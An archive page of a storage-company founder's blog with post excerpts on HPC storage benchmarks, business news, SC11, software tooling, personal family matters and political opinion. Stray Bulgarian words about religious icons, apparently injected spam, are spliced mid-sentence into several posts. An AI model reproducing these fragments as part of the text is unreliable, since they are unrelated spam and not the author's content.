Ahhh ... the wafting smell of election year politics ...
СВЕТИ ГЕОРГИYeah, every few years we get some major stank drifting through our corner of the globe. This is going to be a very nasty election cycle. Very nasty. Many of the meme’s have been tried out against some of the candidates, and what stuck … well … stuck (and stunk). As usual, the good and bright people, the ones we need to be in office to help make hard decisions and leave … once again, these folks don’t seem to want all that goes with the process.
Posts
Highest sustained spinning rust write speed to date on a box
Yeah … the day job hardware. Current generation. Single box. Single thread. Single file system.
Run status group 0 (all jobs): WRITE: io=130692MB, aggrb=4702.9MB/s, minb=4815.8MB/s, maxb=4815.8MB/s, mint=27790msec, maxt=27790msec File size is several times RAM size.Икони на светци
Posts
Growth at day job last year: 60%-ish
Considering the economy, the hard drive manufacturing issues in Thailand, etc. Yeah, this is pretty awesome. Gonna have a big tax bill. And yes, I am gonna grumble that the money would be better spent on ~3 new employees who would generate real economic activity, rather than sending it to the government to waste. Such is life. I don’t want to prognosticate for the year, just yet. But the trajectory we are on is making last year (our 3rd record year in a row), look … mild.
Posts
Busy ... as usual
I’ve been readying a UPS ripping post (not the function, but the company). May backburner that for now. But been really REALLY busy. This is very good, in all aspects. Have lots of opportunities, many quotes out, some telegraphed orders (we know they are coming, we’ve been told, working its way through the systems), … this is turning out to be a very good year, and its only 2-Feb. Hoping I have time to actually write that longer business model post.
Posts
Exactly
БогородицаArticle here. Its interesting that they make very similar points to what I’ve suggested in the past. Even more to the point, they bring up the very real specter of Lysenkoism rearing its ugly head … but now we can call it AGW-ism or CO2-ism. If you dare disagree with those in power, you will be fired and shunned. Lack of evidentiary support be damned, full speed ahead. Lysenko set back Soviet era biology by decades.
Posts
Every now and then ...
Иконописwe give a quote to someone, they see a part number, find a vendor who is selling this at some enhanced discount for any number of reasons, and then ask us to match it. I am guessing that they don’t realize we actually compare our costs to various measures, and make sure our pricing is not out of whack (sometimes our suppliers just can’t seem to give us the same deals they give others, go figure).
Posts
Intel snarfs up Qlogic Infiniband
I guess this gets Qlogic out of the IB arena. Good catch by Rich at InsideHPC I had spoken to a number of folks at Intel over the years w.r.t. IB, and they said they were keeping their options open. IB riser boards are available for some of their MB’s, and from what I have seen, Intel has a renewed push into the MB space. Not sure about the server space in general, they’ve always had that and I think they will keep doing this (at least as a reference design basis).
Posts
A few months into the gluster acquisition by Red Hat ...
… just received a note indicating that our Gluster Reseller contract was voided, and that we would be seeing a new partner portal for Red Hat Storage coming soon where we could apply again for reseller status. Hmmm …. Reading over the information I saw on the Red Hat storage platform, it looks like they are going full on appliance route, which diminishes the value we can potentially add to the platform, and removes much of the differentiation we can do at the stack level (better kernels, up to date drivers, tweaked/tuned drivers/OS, …).
Posts
Hmmm ...
Saw this linked from /.. UEFI boot is to be replacing the old BIOS boot. There are positives about this and negatives. New software is always buggy, and UEFI won’t magically become bug free. UEFI has security controls for signed OS booting (ostensibly to protect users). But the abuse of security systems to exclude competitive/alternative booting … yeah … maybe not such a good idea. It looks like Microsoft is trying to demand that its hardware ARM partners not enable anything but Windows 8 or an equivalent signed OS (is Android signed?
Posts
OT: What is and what should never be
Had to get a Led Zeppelin reference in at least once a year on the blog … Pathology report came back. Ok, in the movie series The Matrix, there is a set of scenes where the story tellers want you to believe that the character (Neo in the clip below’s case) was moving with “super-human” speed, and able to move an accelerate a very large mass (their body) faster than a very tiny mass (the bullet).
Posts
More than a year in, and where are they now?
Its 2-January-2012, and assuming the Mayans' were wrong (ok technically I’ve not heard of any suggestion they did anything more than stop their calendar on a convenient-for-them boundary), an interesting question is, what has happened to the company-formerly-known-as-Sun’s HPC assets? Lustre is one of the most well known, and it now has some type of future ahead of it. I’ll talk about that in a later post. This future was most definitely not assured 1 year ago, and there was considerable uncertainty in its longevity as Oracle had, about a year ago, let go most of the developers.
Posts
OT: T+7 hours ... its done
Bilateral Mastectomy with a sentinel node biopsy. The latter appears to be clean. I can exhale now. Well, mostly. The more detailed pathology data should be ready next week. The rebuilding part is in process. Another few hours. Readying some good jokes to keep the Mrs. happy. Let her know not to worry. U of M hospital guest internet is … annoying. Looks like they let 3 TCP ports out to the world (22, 80, 443).
Posts
Oh no, more code golf!
A new code golfing site. Gaaaak! If I have time to work on such diversions, I’ll post mine under the ID numbercruncher. [update] Played with the starburst code. Have something that works (though they failed to specify their input method, or their output requirement, e.g. newlines, etc.) This is at 135 characters:
<code> $l=@a=split//,shift;$i=-1;while($i++< $l){map$x[$_]=" ",0..$l;$i==int$l/2?@x=@a:map$x[$_]=$a[$i],$i,$l/2,$l-$i-1;print join"",@x,"\n";} </code> </code> which for the input “asdfd” gives
a a a sss asdfd fff d d d among other things.
Posts
This one hits it out of the park ...
On James' blog Heh. I think we’ve had and seen others have this conversation before. RAID is not a backup. Backup is very important. Ok, I did burst out laughing. The low level scan of 1PB of data to find data on the “no_backup” folder … Yeah. Customer has a file system. We’ve asked them “is your data important” and they’ve answered “no”. And we try to really get whether or not its important out of them, as they didn’t spend money on a backup, and there is the potential for a single failure to take down their data.
Posts
Did you ever realize you were doing something wrong?
In a number of our tools, I’ve written rudimentary command parser hacks using getopt and some creative ARGV processing. And this almost always led to something more complex and harder to develop/maintain. For something else we are looking at, I’ve been exploring “compilers”. Basically, define a grammar to do something, then do it. Keep the grammar consistent, simple, and easy to manage. Turns out that this maps far better into our target code than I would have thought.
Posts
Is Java done?
Latest updates from all distro vendors. Java plugins no longer work on any browsers. Updated from Oracle, or the OpenJDK stack, or … Doesn’t matter. Can’t get it to work anywhere. This is a positive development … right? We can call this “experiment” over? Maybe all the nice folks who’ve been coding their IPMI/iLOM tools for years as Java clients will now … please … switch to HTML5 so we can drop this anachronism from our machines for once and for all?
Posts
partially OT: something I am going to write about soon
Business models and business model changes. Not ours, but a general observation I’ve made. This is oddly important for me (outside of the business) as I’ve been writing some stuff I’ve been thinking of submitting for “publication”, and what “publication” means is rapidly changing. FWIW: this is science fiction stuff. I’m an avid reader of these things (much to my wife’s dismay, given the number of books I buy), and I am enjoying writing this stuff as well.
Posts
Incremental update: an extra 10-15% out of JackRabbit JR4
This is nice. Our JackRabbit JR4 high performance tightly coupled storage and computing unit, 54TB usable (72TB raw). Simple 64GB uncached streaming read/write.
Run status group 0 (all jobs): READ: io=65412MB, aggrb=2515.3MB/s, minb=2575.7MB/s, maxb=2575.7MB/s, mint=26006msec, maxt=26006msec Run status group 0 (all jobs): WRITE: io=65412MB, aggrb=2619.3MB/s, minb=2682.7MB/s, maxb=2682.7MB/s, mint=24974msec, maxt=24974msec Yeah, thats about 10-15% better performance (newer driver, updated/tuned kernel, …) Nice! FWIW: some of our competitors have trouble sustaining this performance out of their storage clusters with double to quadruple the number of drives, RAIDs, etc.
Posts
Finally moving to git
Yeah, its taken a while. I started out many moons ago with tools like rcs/sccs, moved to the great new CVS when it came out. Then when subversion (SVN) came out later on, I happily set up a private instance, and tried learning it. Wasn’t too painful. But SVN doesn’t do collaborative development very well. Actually, “not very well” is being kind to SVN. SVK was a perl wrapper around SVN that added some of what we needed.
Posts
positive signs
икони цениAs the year winds to a close … only 16 days left, we’re still quite busy. I am taking this as a net positive. I’ve heard lots of M&A; whispers over the last few months, some interesting things going on that I can’t talk about (not involving us). We’ve got lots of potential activity for Q1 lined up, and this is … good. :) More soon. (Won’t have monster 7 part posts next week, but some I’ve been thinking about for a long time and have been wanting to write about)
Posts
Dear Joe ...
… thanks for being a partner of ours. Unfortunately, the 10x baseline requirement amount of gear that you purchased through other channels doesn’t matter to us, you must purchase the baseline amount by years end (today is 15-December) through one of these very specific (and problematic) channels to remain being a partner. Oh, and there are a few other things you have to do by years end, that we’ve notified you of only 2 days ago.
Posts
As tiburon progresses ...
We are now booting: Redhat 6.1, Centos 6.0, Ubuntu 11.04, and others (including VMs!) via tiburon. Completely painless for compute and storage nodes. This is letting us get to the next phase: Application Specific Nodes (or “appliances on demand” in more common language). Basic idea is, spend zero … identically zero time on your expensive private/public cluster/cloud/grid/yadda yadda doing an installation. Seriously, you should not be paying cloud providers for this, and if you are, this is a problem.
Posts
Semi OT: New laptop is in
Have Linux loaded. And windows 7 pro (actually upgraded from the windows 7 home they had). Ok … I like it. It is very fast. About as heavy (maybe a little more so than the Dell). Keyboard is a chicklet style. I’m ok with this, Dell had a more standard type of keyboard. I can touch type on this without problem. If anything, I like it a little better. Graphics are awesome.
Posts
Big memory machines ... part 2: This time with working riser cards
Yeah baby!
top - 14:55:24 up 2:38, 1 user, load average: 0.13, 0.17, 0.17 Tasks: 697 total, 1 running, 696 sleeping, 0 stopped, 0 zombie Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 1009.840G total, 18.159G used, 991.680G free, 0.000k buffers Swap: 0.000k total, 0.000k used, 0.000k free, 148.590M cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ P COMMAND 4455 root 20 0 15532 1720 944 R 1.
Posts
Update on the lawyer-bomb across our bow
Yeah, with all what we have going on, the last thing we need is a clueless company firing a lawyer-bomb across our bow. Remember that life isn’t fair, no time is ever a good time, and sh!t happens. It seems that the whole purpose of their … er … communication … was to try to get us to buy the property rather than taking us to court for rent that is not due them.
Posts
OT: options are known, surgery date is set
In any cancer, it appears the most important thing is to control its growth, arrange for removal, and expedite this process. You don’t want the buggers hanging around for longer than needed. We got our surgery date this past Monday. 1 day after my daughter’s 12th birthday, my wife will undergo the operation. Its the recovery process we are preparing for, though the sheer velocity of this stuff is hitting hard.
Posts
Ok, I gave in and did it
My trusty Dell laptop is about to be retired. Been a year and a half overdue. Doug was working hard trying to sell me the benefits of Mac Air (he has the company’s only unit). He also has the Mac mini on his desk. I need a serious graphics card in the laptop. An NVidia card (for the occasional CUDA programming bit, and some things I work on in the background) is preferred.
Posts
Moving web code base from Catalyst to Mojolicious
Its a long story. For those who don’t know, Catalyst is a Perl based web framework. So is Mojolicious. The person who started developing Catalyst years ago, left that group, and started Mojolicious later on. I like many things about Catalyst. Like other MVC frameworks, it lets you divide up your logic between controllers (the heavy lifters), the model (aka the database), and the display logic. Prior to this, I wrote some rather ugly looking code which combined controllers and display logic.
Posts
Monitoring tools
We have a collection of tools that we use for various monitoring. Some are the classical standards (iostat, vmstat, …), the somewhat more heavyweight (collectl, dstat), the simple (not in a bad way) graphical tools (munin, ganglia, …). We’ve found tools like Zabbix do a good job of killing some machines, as there are often memory leaks in these tools. What we’ve not found, anywhere, has been a good set of simple measurement tools that provide data in an easy manner that allow for easy inclusion into something akin to a dashboard.
Posts
big memory machines
Haven’t finished debugging this unit yet. Thought you might like to see top info. These are physical CPUs BTW, not SMT.
top - 09:21:29 up 3 min, 2 users, load average: 0.22, 0.21, 0.09 Tasks: 219 total, 1 running, 218 sleeping, 0 stopped, 0 zombie Cpu0 : 0.7%us, 0.3%sy, 0.0%ni, 99.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.
Posts
Ahhh ... drama ... just what I need right now
Way back some time ago, our landlord, whom we were somewhat concerned about due to their financial state (lots of vacant spots here in our complex), had their mortgage called by the bank that took over for the bank they’ve had before, when it went belly up. That new bank called their loan. They didn’t notify us of this until we got the note from the lawyer demanding we pay them rent rather than the landlord.
Posts
OT: it really focuses your attention on the important things
[Update below the fold] My wife has this tongue-in-cheek “theory” on balance in the universe. Comes from being a physics geek I guess (yeah, we are a pair). Maybe I’ll tell the “spherical horse” joke some day again, in public. Our opening of 2011 was, well, crappy. And thats an understatement. We lost her father Frank to cancer. He had fought off one form, and 2 years later, it reared its ugly head.
Posts
I just can't say enough good things about HP's procurve networking gear
Basically, their support rocks! Their switches are pretty good to begin with. But (apart from very long phone waits … 50+ minutes in this case), their support team is exactly what I want to deal with. No nonsense, speaking to someone who knows whats going on with the units. Kudos again to #HP !
Posts
Some of the more mainstream publications are now at least acknowledging the prospect of an epic failure
… in climategate … The registers piece isn’t bad. Actually quite good. Their thesis is “this sort of stuff happens when you get big money/politics following dubious claims, a cottage industry and group think evolve”. They note similar examples from other industries. I am not saying I completely agree with their characterization, it sounds reasonable, but it is comparing somewhat dislike things with a similar metric. The issue is the public policy (and money, influence, power, …) flow from the political class and could polute the underpinnings of the scientific class.
Posts
Senses of urgency
We do lots of business with customers who want things yesterday. We do what we can to accommodate, but we do build things in a just-in-time model. Avoids costly inventory, and keeps us nimble. This also means we have to micromanage our suppliers. Many don’t quite understand what a “sense of urgency” means. When we tell them we want something by a specific date, and they ship it a month later … Or a case we are dealing with now, where we’ve had a long/huge wait from a supplier, who then shipped us something non-working.
Posts
Announcing dust v1.0
Dust has finally …. FINALLY …. been released. We’ve had the driver update packs out there for a while, but finally we’ve released DUST. What is DUST you might say? How about a way to automatically update drivers from source/distributions? But wait … isn’t that just dkms? Sort of. We’ve found … horrific problems … with DKMS that we couldn’t solve. We wound up writing scripts to work around DKMS as it didn’t build things the way we needed them built.
Posts
Uptick in requests for software only solution
Some locations are farther than others, and this makes shipping gear pretty expensive. We’ve been asked for a software only version of our stack from the 2 remaining continents we don’t have installs on (ok, 2 of 3 … not to much business in Antarctica right now). I won’t get into the positives/negatives of this business model. Shipping bits lowers costs as compared to shipping atoms. But atoms are tangible, and require a cost to reproduce patterns that bits don’t impose.
Posts
#SC11 benchmarketing gone horribly awry
OMFG … we were (and are) continuously inundated with benchmarketing numbers. These numbers purport to represent the system in question. They don’t. We can derive their numbers by multiplying the number of drives by the theoretical best case performance, assuming everything else is perfect. Never mind that it never is perfect. Its that the benchmarketing numbers haven’t been measured, in a real context. We do the measurements in a real context and report the results to end users.
Posts
#SC11 interviews, observations, and thoughts
Yeah, this show had lots of folks talking storage. Obviously we did too. Nicole from Datanami (she had a terrible cold running at the time, I hope she is feeling better), asked me to give a short set of non advertising type interviews. Below is what I did, given no prep, no forwarning, and about 30 seconds to mentally prepare (and that might be generous). Part 1: Big Data in Media and Entertainment
Posts
#SC11 wrap up, part 1 (short)
Back in Michigan. ?Long flight, quite tired, but back. This was a good show for us. ?A very good show. ?Gave away lots of siMugs, released siFlash, did demos and had discussions. Generally speaking, we had good booth traffic, and many readers of this blog came by to say hello. ?Thank you for that! ?I very much enjoyed this, and meeting people in person for the first time. Sponsoring Beobash was fun.
Posts
#SC11 T-1 and counting ... Beobash, booth and stuff...
Tonight was/is Beobash. ?First time I stopped drinking the beer, and started buying the beer. ?Was very nice, but we were (collectively and individually) exhausted. ?Snapped a few pics. ?Will try to have them up tomorrow. ?Very nice venue. ?Very good crowd. Booth (#SC11 booth 4101) is up. ?Amazingly, everything seems to be working. ?Even missed shipping a few things (yes, yes we did), and for the most part, was able to fix that.
Posts
#SC11 T minus 2 days : on the plane ... yeah ... on the plane
Somewhere over Montana, around Helena. ?Bumpy weather up ahead. ?Finished PR v1 for siFlash, Doug is editing. ?Will get this out tomorrow at a few venues (we’ve promised one specific one will be first). Working on the presentations for the booth. ?siFlash intro, the whole arc with big data, siCluster and our JackRabbit and DeltaV point storage units, and Tiburon. ?And the use cases presentation. ?Didn’t have time to get permission to get company name usage permission (e.
Posts
#SC11 T minus 3 days: the $dayjob mailing
Finally got this out the door. There were some issues in doing so … our CRM tool seemed to get brain-freeze. Test emails worked fine. But the real ones? Nah … fuggedaboutit. So here it is, in all its glory. We try our best (really) not to spam. I don’t like it and I know our customers don’t like it.
Storage Solutions
As a high performance big data storage specialist, Scalable Informatics is well positioned to provide your company with fast, effective, dependable, and cost-effective storage solutions.
Posts
The joys of new tools ... and discovering broken/missing functionality within them
The object of my attention this morning is dracut, the replacement for the venerable mkinitrd in the RHEL/Fedora lines. Dracut has great promise, in that it is being built as a construction kit for initial ramdisk for booting Linux. Unfortunately, like mkinitrd, it has a number of … er … failures. Happily it has a concept of an shell you can drop into if things go pear shaped. mkinitrd generates initrd’s that will often simply kernel panic with no way to debug.
Posts
Using Makefiles for analysis pipelines
Got a mess-of-data. Whole load of it. Need to analyze it. Again and again and again. Don’t want to cut n paste. Or write too much code. Need to automate plot generation. This reminded me of my thesis many (cough cough) years ago. I used a Makefile to automate driving TeX. And image formatting, and final document assembly. Yes, to write my thesis, I typed “make”. Sure enough, same type of process, different decade (cough millennium).
Posts
Almost forgot ... an instant on cluster
We setup a nice Ubuntu cluster for a customer in the financial services world recently. They wanted something that was similar enough to what they knew, and was as close to painless for them to use as possible. Make it like a Ubuntu system. And make it easy to manage. Real easy. The issue was and is, pretty much none of the major cluster distros really support Ubuntu. A few have some hacks to enable some level of support.
Posts
in SC mode ... and trying to ship orders before we fly out ... and working on support ... and ...
I’m gonna need another vacation soon. This is nuts. Got a bunch of machines going out to the UK next week, a set of SSDs off to Sweden, machines to Texas, and California. New orders from the east coast (a number of repeat customers). Oh … and trying to get our demo systems built, and ready, and the demos up. And get the presentations together. And the PR done. And the investment thingy (gotta nudge the lawyer again, really wanted to announce this by SC11).
Posts
And now readers, its time for deep thoughts ...
[the guru sits down and starts typing with nonchalance] Complex software stacks lead to complex and often opaque failure modes. [slight bow, stands up, leaves room] Infiniband …. WHY WHY WHY WHY WHY … (grumble)
Posts
... and Sandforce is gobbled up by LSI ...
From the register … This is interesting, as LSI appears to be girding for the next gen in storage. Flash (the PCIe variant) and SSD (the disk channel variant) are on the rise, and things that add value in that chain will be quite interesting acquisitions. We work closely with Virident, and it wouldn’t surprise me if they, or Texas Memory Systems were acquired by a larger entity. This isn’t consolidation in the classical sense, this is girding for future battle.
Posts
#SC11 countdown and some administrivia
So we are on the long march to #SC11 (we are booth 4101, please do stop by!). Figuring out the final bits of the booth content. Working on presentations. Hoping we will have enough disks for the demos I am working on putting together. Then the fun stuff. The mugs: Doug and I had fun with these. Aren’t giving them out to everyone … you have to really cozy up to us for one … and we will have a Keurig coffee/tea maker there so we can fill em.
Posts
Is this another "Perl indistinguishable from line noise" argument? Don't know ...
… but I do know that the analysis has some … er … flaws. Yeah. Flaws. I’ll ignore their sample size issue for the moment (though it does go to the size of their error bars … I hope they appreciate the inverse functional relationship between these two). Take two sets of data with error bars. Put them down on the same graph. The data from each set overlaps within the error bars of the other set.
Posts
A new spin on 'hard cases make for bad laws' ... but with benchmark codes
We run (as you might imagine) lots of benchmarks. We do lots of system tuning. We start with null hypotheses and work from there. Sometimes you can call that the baseline expected measurements. Your call on what you want to call it. But a measurement implicitly implies a comparison to a known quantity. In the case of the baseline or null hypothesis, you measure what you should believe to be a reasonable configuration, the way it would be used.
Posts
Iris ... are you our new overlord?
So I started playing with Iris on my android phone. Not because of Siri envy, but because I heard it was … er … interesting. I started out with the usual … Me: “What is the airspeed of an unladen swallow” Iris: 28 miles per hour Ok, that was interesting. Then I asked a few other fact based questions, should be easy to answer. Finally, I wanted to see if there was some humor in what it might say (not that Iris has a personality that wishes to express humor, but possibly on the part of its programmers, or in the search results).
Posts
OT: Minor drama of renting an office
So we have our site at a nice small light industrial site. Good pricing, reasonable location. Been here 3+ years. The landlord is about to lose the property to either the bank due to their missing paying their mortgage, or the state, because they haven’t paid property taxes. Oh, and they haven’t paid water or trash collection bills. Found out about all of this last week when we were in NJ installing a cluster.
Posts
anti-scaling (1/N) problems
Imagine you have a fixed sized resource. Imagine you can completely consume that resource from 1 client. Now make this two clients, and completely consume the resource. Which is of fixed size. Each client will get 1/2 (on average) of the resource. Now make this four clients, and completely consume the resource. Which is of fixed size. Each client will get 1/4 (on average) of the resource. Don’tcha just love that anti-scaling behavior?
Posts
Design and driver issues exposed under very high loads
Most folks, when they build Fibre Channel systems, aren’t assuming a very high IOP rate. No, really. Each channel of an FC8 connection is about 1GB/s, which with 4k operations (neglecting overheads and other things), would give you about 256k IOPs. To date, most of these units have been connected to spinning disks, which, individually might max out at 300 IOPs. So from their design perspective, you could put about 874 disks per connection, assuming a perfect configuration, to max out the data channel.
Posts
In the run-up to SC11, yeah ... I'm busy ...
Wow … After getting back from the UK and Sweden, a whole slew of orders came in from several existing and new customers. And booth prep (remember, we are in 4101, stop by and say hello!). And logistics … and support … and box tuning (in house, at customer sites, …) and quoting, and performance monitoring/analysis for several customers (including one where strace seems to have missed child IO processes …).
Posts
One would think I know this by now ...
… when you prepare a unit for benchmarking … mebbe … mebbe … its not such a good idea to configure it in … I dunno … super-conservative mode which … er … effectively nukes most of the performance? Mebbe? Maybe normal default config mode … which is pretty much what we should have done … is whats needed? FWIW: for the unit we are bringing to #SC11, 2 initiators over 10GbE iSCSI were running this baby to 850+k IOPs, 4k block random read write (30% mix on write, mostly read) sustained for an hour for well over 100GB of data (far far larger than internal caches).
Posts
A plea for sanity in benchmarking SSDs (and storage)
This is really starting to worry me. I see site after site running similar sets of programs against SSDs, generating the same numbers, within error bars. The problem is that the numbers they generate are meaningless due to several measurement flaws. First: Sandforce controllers compress data. Which means that some data (say simple repeating patterns of, oh, I dunno, zeros?) will compress really well, and show bandwidths far higher than real use cases will measure.
Posts
RIP Steve, and thanks for all the fish
Steve Jobs, a young man of 56, passed away this evening. While not so much in traditional HPC, Apple profoundly changed the way we work with … no … the way we use, and think about using computing technology. He is credited with the vision, though Apple has had and does have many very smart people working there. My condolences to his immediate family, and his extended family. Today, we bought our first Mac book Air.
Posts
Dead on: Redhat grabs Gluster
Readers of this blog will know I’ve been saying this publicly for a while (and no, I had no inside knowledge of this, no knowledge of it whatsoever, no one spoke to me, and I own no shares of any of these companies). Redhat acquiring Gluster is a good thing. While AB, Hitesh, and the team have done a bang up job getting the product out, and doing interesting things with it, they needed additional capital resources to take it to the next level.
Posts
HPCWire readers choice awards: feel free to write in awesome companies/products!
See their link. They seem to have nicely allowed for write-ins, which makes voting better :) We don’t do much in manufacturing, so there’s little point to this for us. In HPC for life sciences, Scalable Informatics JackRabbit is in use at a number of sites as a very high performance storage unit. We don’t do much in automotive either. We do lots in financial services; with our Scalable Informatics JackRabbit being the best in breed performance for spinning rust systems, and from my understanding, causing some of our friends with pure PCIe Flash or SSD to say WTH!
Posts
knobs that work
As mentioned earlier, we’ve had a consistent problem with a few customers who wish to ignore their bills. They’d like to pretend we have no interest in getting paid, so they don’t pay. This is part of the reason why we’ve stopped acting like a bank. We aren’t very good at it, and its not our core competency. You want credit, go to a bank. You want the fastest (in terms of measured speed, not theoretical guesses) storage you can get, we can help.
Posts
HP's board asks a deep fundamental question, possibly 10 months too late
“Is this the right person for the job”? I pointed out that the direction itself was probably not that well thought out, and the concept … dropping 1/3 of your revenue base, when you are atop the market in terms of installed base and run rate, probably wasn’t an idea that really should have been given serious credence. HP’s board is now, belatedly, asking … do we have the right person for the job?
Posts
On the test track with some new relampago device ...
and we hit the throttle … crack it open … lets see what this baby can do Looking at a sustained … well … I dunno … 1.2 million IOPs? Occasional bursts to 2.4M IOPs? At very nearly 10 GB/s? What does fio say?
read : io=524416MB, bw=9339.6MB/s, iops=1195.5K, runt= 56150msec and
Run status group 0 (all jobs): READ: io=524416MB, aggrb=9339.6MB/s, minb=9563.8MB/s, maxb=9563.8MB/s, mint=56150msec, maxt=56150msec Nice! You may see something like this at SC11.
Posts
Semi OT: Solar Ypsi
Sometimes you know what your friends and acquaintances are up to … and sometimes you see them in adverts for Google search … Here’s the advert:
Its semi-OT as the person, Dave Strenski, is also an HPC hand of quite a stretch at Cray, and has been a colleague of mine during our SGI/Cray days. He was one of the reasons I thought Cray had some of simply the best technical people anywhere.
Posts
Some boot options considered harmful to performance
иконопис(BTW: still in London, then off to Stockholm, then home) A customer just saw this with RHEL 6. Windows performance was higher than Linux performance on the same machine. The customer didn’t understand it, we guessed at first about it, and in the end our initial guess was wrong. But we caught what was wrong, with a WAG, and it troubled me. So I wrote this. First clue as to the nature of the problem came from numastat.
Posts
Coming soon to a JackRabbit and DeltaV near you ...
… 4TB drives. Imagine, a nice 192TB in a single unit, coupled to a 5GB/s data movement engine. Coming soon … :)иконописikoni
Posts
Hitachi Data Systems acquires Bluearc
[disclosure note: this is our space, so we have definite opinions on this] This was liable to be the only possibly path for Bluearc to continue outside of an IPO. The latter would probably not have gone well. They raised their last round of capital a year ago. Reading what I wrote then, it was fairly prescient. Since that was written, EMC acquired Isilon, Netapp acquired LSI’s Enginio and other products, Dell grabbed Compellent (different market), HP grabbed 3Par.
Posts
Seeing the light ... lots of app migration to accelerators (GPUs in particular)
Last week, Gaussian Inc. started publicly talking about its GPU port of its Gaussian code. This is as conservative a development company as you will find. I know many other companies with ports (I won’t violate NDAs, which I’ve signed with a number of folks who post/comment here, and who read these … feel free to post a note/link to your accelerated app). We’ve seen the early adopters come and stay.
Posts
The business of business
Just got an email from a vendor of workplace notices that reads
I won’t use the exact verbiage I think is appropriate for this.
So we’ve got an economy that’s struggling (well, we can euphemistically call it struggling), we have small businesses looking with great unease at future cost obligations due to new rules and regulations (one of which has been ruled unconstitutional, but the administration is pushing ahead on it anyway) … and the current administration is seeking to make sure that my companies employees know that they can organize, that I have to tell them this, and that its unfair if I don’t.
Posts
Science by ad hominem? The continuing saga of a debate that is not scientific, but personal
This is sad. I am not sure precisely who is beclowning themselves, but we see something that amounts to an ad hominem attack on a pair of researchers, who had the temerity to publish something that disagreed with the orthodoxy. Along the way, they are described as “uncareful” and “serial error” creators. Their paper has been ripped to shreds in blogs, and by a particular aspect of the media, as well as by various members of the orthodoxy.
Posts
badly underwhelmed by 120GB Intel 510 performance
икониThe day job uses lots of SSDs as well as disks in various of our products. We rely upon internal testing and external benchmarks (which tend to be poor at best, but a very rough zeroth order test) to select them. We had a pair of Intel 510 SSD units in for a customer, and they performed … just meh … not all that exceptional. Better than our OS drives, but not as good as the higher end SSDs.
Posts
Fixing pausing Nehalem/Westmere units
иконографияSome Nehalem and Westmere units have … er … interesting unintended features … yeah, thats the politically correct way to say it. We like Intel and their products (and we’ve liked AMD in the past and their products). But we gotta call this one. As you watch dstat output, you see these occasional … hangs … for a few seconds. As if someone is monkeying with the clock. And that is, to a degree what appears to be happening.
Posts
Raw unapologetic firepower in a single machine ... a new record
This is a 5U 108TB (0.1 PB) usable high performance tightly coupled storage unit we are shipping to a customer this week. This is a spinning rust machine. We’ve been busy little beavers. Tuning, tweaking. And tuning. And tweaking. Did I mention the tuning and tweaking?
Run status group 0 (all jobs): WRITE: io=196236MB, aggrb=4155.7MB/s, minb=4255.4MB/s, maxb=4255.4MB/s, mint=47222msec, maxt=47222msec Oh. My. But … it gets … better.
Run status group 0 (all jobs): READ: io=196236MB, aggrb=5128.
Posts
knobs
A knob is something you can turn, in theory, to effect a change in output condition. In my business, I have a few knobs I can turn for customers to help them. We can be quite creative in this. We are often asked to help in cases where other companies would just start blinking rapidly. I like doing this. I really do enjoy working with customers and helping them solve their hard problems.
Posts
Day job will have a booth at SC11 ... Woot!
икони на светциWhats different about this one? Its ours, not space in someone else’s. Gives us more freedom, but also greater responsibility. One of the harder things to do is to figure out what to bring and show, and what to leave in the lab. Shipping stuff to the floor is expensive, time consuming, and a royal pain in the rear. Leaving it in the lab, and leveraging the network (not the wireless … oh god that was horrible last year) is probably a better option.
Posts
Day job adds a director of sales
Took us long enough, but fundamentally, you have to work on getting the right team together. Someone I’ve known and respected for quite some time became available. I’ve been saying for a while we need someone just like him. So I didn’t miss the opportunity. Looking forward to reaching more customers and partners with him on board. More later …
Posts
Another day job milestone: afterburners kicking in on the company!
As of today, we have achieved our highest revenue ever in a year as a company. And the year is only 3/4 over. We’re not done. Not by a long shot. If we shut the doors, and went on a nice 3+ month long vacation until the end of the year … we’d have a 20% growth rate over last year for revenue. As it is, the 4th quarter is usually our busiest time.
Posts
'Amusing' benchmarketing ... without ever having run a benchmark!
Imagine you have a product, and you really haven’t measured its performance, but you want to make performance claims. So you take an “easy” way around this. You simply add up all your bandwidth or IOP data. Yeah, thats it, you add it up. No, I’m not kidding. You do this. Is this meaningful in the HPC world? Hell no. Do people do this? Hell yes. Is it wrong? Extremely. Should you call vendors out who do this?
Posts
A 'cool' xfs bug
No, really, bugs can be cool … Customer has a user with a proclivity towards writing large files. Sparse large files. Say a couple Petabytes or so. Single file. I kid you not. (filenames and paths changed)
[root@jr4-2 ~]# ls -alF /data/brick-sdd2/dht/scratch/xyzpdq total 4652823496 d--------- 2 1232 1000 86 Jun 27 20:31 ./ drwx------ 104 1232 1000 65536 Aug 17 23:53 ../ -rw------- 1 1232 1000 21 Jun 27 09:57 Default.
Posts
... and Ubuntu 11.04 has an every so slightly broken root on iSCSI ...
Православни икониUgh. See here. Got bit by this. BTW: The new internals of Tiburon are getting even more wild. This thing is turning into a very powerful system for booting large numbers of machines with (nearly) identical configs, very quickly (hmmm … can you say … cluster? Cloud? VMs? …. mwhahahaha!). Will be re-adapting our menu system for this, but the Web GUI portion for configuring this is definitely in the near future.
Posts
Been working on a GUI ... starting to hook the bits together ...
The day job is asked for monitoring and admin GUIs for our products. I’ll be the first to admit I am a CLI person these days (having started out a CLI person, then becoming a GUI person, now back to a CLI person). I understand the desire for this, and some of the rationale behind it. So we’ve been thinking how to provide this as simply and unobtrusively as possible. And leverage/use/reuse our CLI goodness.
Posts
An interesting perspective on running and maintaining a business in California
[update: reorganized to have link up top, and commentary below this] Have a read of this blog entry. Very interesting. As a small business person, I am acutely aware of all the myriad ways that rules, regulations, taxes and fees can rise unexpectedly upon you. When taxes aren’t sane or predictable, you can suddenly get a bill for a substantial fraction of a well paid employees monthly or yearly salary. We had that experience last year with Michigan’s MBT which replaced the SBT.
Posts
Interesting comment from an SSD vendor support person
Color me unimpressed. You have a “disk” drive, you expect all the trappings of that “disk” drive to work. Like activity lights. So you plug this device into a backplane that lights its activity lights from the disk. And it doesn’t work. Speaking with the backplane folks, they get their signals from the disk. Speaking with the disk folks … Me: The activity light appears to be solid on all the time.
Posts
Very cool science: broad spectrum anti-viral
